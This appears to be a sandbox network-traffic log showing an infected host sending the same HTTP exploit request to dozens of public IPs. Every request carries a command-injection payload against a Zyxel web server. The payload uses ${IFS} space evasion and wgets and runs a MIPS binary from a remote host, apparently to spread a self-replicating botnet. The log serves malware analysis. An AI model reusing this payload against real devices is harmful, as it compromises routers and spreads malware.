                                      Jan 19, 2024 17:29:45.024429083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7402192.168.2.1433146129.118.38.157443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.024468899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7403192.168.2.1457610157.238.122.14443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.024488926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7404192.168.2.1459240149.49.15.208443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.024549961 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7405192.168.2.14469842.243.140.122443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.024583101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7406192.168.2.1454556210.108.130.106443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.024630070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7407192.168.2.1436164114.129.107.182443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.024665117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7408192.168.2.145035641.198.240.199443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.024718046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7409192.168.2.14392122.91.171.72443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.024770021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7410192.168.2.143291241.24.79.230443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.024810076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7411192.168.2.1438038201.255.131.121443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.024832964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7412192.168.2.1434602177.70.100.25443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.024872065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7413192.168.2.143661479.21.169.188443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.024913073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7414192.168.2.146023287.42.121.252443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.024969101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7415192.168.2.144274038.11.143.115443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.025002956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7416192.168.2.1435996145.177.76.127443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.025042057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7417192.168.2.144326446.139.153.207443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.025088072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7418192.168.2.14576169.249.53.209443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.025130987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7419192.168.2.1454256200.70.120.46443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.025165081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7420192.168.2.1448468203.79.17.80443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.025193930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7421192.168.2.1440244132.13.53.205443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.025255919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7422192.168.2.1435070157.158.30.201443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.025273085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7423192.168.2.145020885.240.228.179443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.025335073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7424192.168.2.1460802206.195.71.238443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.025376081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7425192.168.2.1452540212.250.197.92443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.025410891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7426192.168.2.1433152213.243.105.157443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.025439978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7427192.168.2.145468244.55.110.65443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.025470972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7428192.168.2.144760077.193.48.68443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.025516033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7429192.168.2.1441742197.36.62.38443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.025557995 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7430192.168.2.1443264154.213.46.160443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.025589943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7431192.168.2.14561642.21.125.108443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.025661945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7432192.168.2.145832697.4.121.78443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.025684118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7433192.168.2.1437090221.243.5.21443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.025718927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7434192.168.2.1453582158.158.112.92443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.025764942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7435192.168.2.1454482183.49.124.68443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.025804996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7436192.168.2.1447186108.76.44.115443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.025836945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7437192.168.2.1438414220.98.157.12443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.025866032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7438192.168.2.1440680152.122.223.91443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.025917053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7439192.168.2.143348464.50.87.35443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.025939941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7440192.168.2.1433578122.156.61.161443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.025990009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7441192.168.2.145567469.78.221.90443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.026000977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7442192.168.2.1459456124.165.101.203443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.026046991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7443192.168.2.1433746165.230.250.239443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.026093006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7444192.168.2.145690279.14.222.47443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.026124001 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7445192.168.2.1444522186.160.10.117443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.026160002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7446192.168.2.145942041.64.241.50443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.026216984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7447192.168.2.1446454189.22.95.69443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.026262999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7448192.168.2.144184685.41.111.222443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.026308060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7449192.168.2.144654098.219.58.231443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.026340008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7450192.168.2.144036440.152.51.210443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.026385069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7451192.168.2.144673640.1.77.24443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.026434898 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7452192.168.2.1454444106.29.156.234443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.026464939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7453192.168.2.1435028205.58.40.69443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.026496887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7454192.168.2.14394401.76.99.44443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.026499033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7455192.168.2.1449484171.26.194.39443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.026541948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7456192.168.2.143389859.0.0.69443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.026566029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7457192.168.2.1445846165.127.204.44443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.026622057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7458192.168.2.1432978208.182.233.19443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.026679039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7459192.168.2.1458534103.245.204.62443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.026698112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7460192.168.2.1445210101.52.100.82443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.026746035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7461192.168.2.1451310222.64.185.233443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.026783943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7462192.168.2.144811244.255.146.201443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.026838064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7463192.168.2.1458294188.112.54.67443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.026887894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7464192.168.2.143626262.18.189.66443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:45.026912928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7465192.168.2.1458692220.5.177.98443
                                      TimestampBytes transferredDirectionData
